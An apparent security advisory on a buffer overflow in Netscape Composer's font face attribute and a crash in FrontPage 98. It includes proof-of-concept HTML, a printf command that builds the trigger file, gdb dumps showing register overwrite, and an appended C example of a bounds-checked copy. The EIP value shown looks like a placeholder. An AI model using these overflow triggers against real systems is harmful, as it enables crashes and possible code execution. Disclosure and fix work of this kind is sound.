COMMAND

    FrontPage and Netscape Composer design error

SYSTEMS AFFECTED

    - Microsoft FrontPage 98
    - Netscape Composer 4.77 (U.S. release), possibly other versions

PROBLEM

    S[h]iff - [ISR] - Infobyte Security Research found the following.

    When an HTML file is created that contains a font tag whose face
    attribute is left blank, for example:

    ------------------------------
    <html>
    <body>
    <font face="">Hola!</font>
    </body>
    </html>
    ------------------------------

    both FrontPage and Composer crash because the blank argument is
    handled incorrectly.

    Buffer Overflow
    ---------------

    Composer has an unchecked buffer for the face attribute of the font
    tag. Supplying a face value of 191 bytes or more overwrites part of
    memory, for example:

    ------------------------------
    <html>
    <body>
    <font face="AAAA...AAAA">Hola!</font>
    </body>
    </html>
    ------------------------------
    (the face value is the letter A repeated; A >= 191 bytes)

    -------- [ gdb logs ] --------
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

    Program received signal SIGSEGV, Segmentation fault.
    0x846e6bb in CEditElement::SetTagData () at eval.c:88
    (gdb) info all-registers
    eax            0x0              0
    ecx            0xffffffff       -1
    edx            0x90a3be0        151665632
    ebx            0x90a3be0        151665632
    esp            0xbfffe0d4       0xbfffe0d4
    ebp            0xbfffe0e4       0xbfffe0e4
    esi            0x12147820       303331360
    edi            0x12147820       303331360
    eip            0x846e6bb        0x846e6bb
    eflags         0x10246          66118

    * The program begins to overwrite the saved return address when the
      face value is 197 bytes long. Check this:

    # printf "<html>\n<body>\n<font face=\"AAAA...AAAA\">Hola!</font>\n</body>\n</html>" >> source.htm
    (A repeated 197 times)

    The created source.htm contains:

    ---------------------------
    <html>
    <body>
    <font face="AAAA...AAAA">Hola!</font>
    </body>
    </html>
    ---------------------------

    ------- [ gdb logs ] -------
    # gdb netscape
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

    * "Here the program loads the HTML file with AAA... in the face argument"

    Program received signal SIGSEGV, Segmentation fault.
    [[0x12345678]] in ?? () at eval.c:88
    (gdb) info all-registers
    eax            0x9003e22        151010850
    ecx            0x0              0
    edx            0x25c00900       633342208
    ebx            0x90a39a0        151665056
    esp            0xbfffe0c0       0xbfffe0c0
    [ebp           0x41414141       0x41414141]
    esi            0x90d6000        151871488
    edi            0xbfffe0ec       -1073749780
    [eip           0x12345678       0x12345678]
    eflags         0x10246          66118

SOLUTION

    Nothing yet.
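The defect class the advisory describes is an attribute value copied into a fixed-size buffer without a length check. The following C program is an added example, not code from the advisory or from Netscape; it shows the checked copy that was missing, applied to a small hypothetical `face` attribute extractor. The 191-byte buffer size is an assumption taken from the threshold reported above (the real Composer buffer size is not stated), and the sample documents are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Buffer size modelled on the 191-byte threshold in the advisory.
 * Assumption for illustration; the real Composer size is not on the page. */
#define FACE_BUF_SIZE 191

/* Result codes returned by the hardened copy and the parser. */
enum face_result { FACE_OK = 0, FACE_MISSING = -1, FACE_TOO_LONG = -2 };

/*
 * The crash pattern is an attribute value copied into a fixed stack buffer
 * with no length check, roughly:
 *     char face[FACE_BUF_SIZE];
 *     strcpy(face, value);          // overruns once value is long enough
 * set_face_checked does the same job but refuses values that do not fit,
 * leaving room for the NUL terminator.
 */
static enum face_result set_face_checked(char *dst, size_t dstsz,
                                         const char *value, size_t len)
{
    if (len >= dstsz)
        return FACE_TOO_LONG;
    memcpy(dst, value, len);
    dst[len] = '\0';
    return FACE_OK;
}

/*
 * Hypothetical helper (not Composer's parser): find the first <font ...>
 * tag carrying a face="..." attribute and copy its value into dst.
 */
enum face_result extract_font_face(const char *html, char *dst, size_t dstsz)
{
    const char *tag = strstr(html, "<font");
    while (tag) {
        const char *end = strchr(tag, '>');
        if (!end)
            return FACE_MISSING;          /* unterminated tag */
        const char *attr = strstr(tag, "face=\"");
        if (attr && attr < end) {
            const char *start = attr + strlen("face=\"");
            const char *close = memchr(start, '"', (size_t)(end - start));
            if (!close)
                return FACE_MISSING;      /* unterminated attribute */
            return set_face_checked(dst, dstsz, start, (size_t)(close - start));
        }
        tag = strstr(end, "<font");       /* try the next font tag */
    }
    return FACE_MISSING;
}

/* Parse one document into a fixed buffer and report the result code. */
int check_document(const char *html)
{
    char face[FACE_BUF_SIZE];
    return (int)extract_font_face(html, face, sizeof face);
}

/* Build a constructed document whose face value is 'A' repeated len times
 * (mirroring the advisory's test input) and report how the parser treats it. */
int check_face_of_length(size_t len)
{
    const char *head = "<html><body><font face=\"";
    const char *tail = "\">Hola!</font></body></html>";
    size_t hl = strlen(head), tl = strlen(tail);
    char *doc = malloc(hl + len + tl + 1);
    if (!doc)
        return FACE_MISSING;
    memcpy(doc, head, hl);
    memset(doc + hl, 'A', len);
    memcpy(doc + hl + len, tail, tl + 1);   /* copies the NUL too */
    int rc = check_document(doc);
    free(doc);
    return rc;
}

int main(void)
{
    /* Constructed inputs, not taken from the advisory. */
    printf("face=\"Arial\"      -> %d\n",
           check_document("<html><body><font face=\"Arial\">Hola!</font></body></html>"));
    printf("no font tag       -> %d\n",
           check_document("<html><body>Hola!</body></html>"));
    printf("190-byte face     -> %d\n", check_face_of_length(190));
    printf("191-byte face     -> %d\n", check_face_of_length(191));
    printf("197-byte face     -> %d\n", check_face_of_length(197));
    return 0;
}
```

With the assumed 191-byte buffer, a 190-byte value is the longest that fits with its terminator; 191 bytes and above are rejected instead of spilling past the buffer, which is the boundary the advisory reports for the unchecked original.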